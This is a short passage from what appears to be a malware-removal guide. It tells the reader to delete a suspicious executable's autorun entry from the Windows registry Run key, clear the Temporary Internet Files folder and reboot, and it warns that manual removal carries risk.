  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "otqvyruekg.exe" = "C:\Windows\WindowsUpdate\otqvyruekg.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
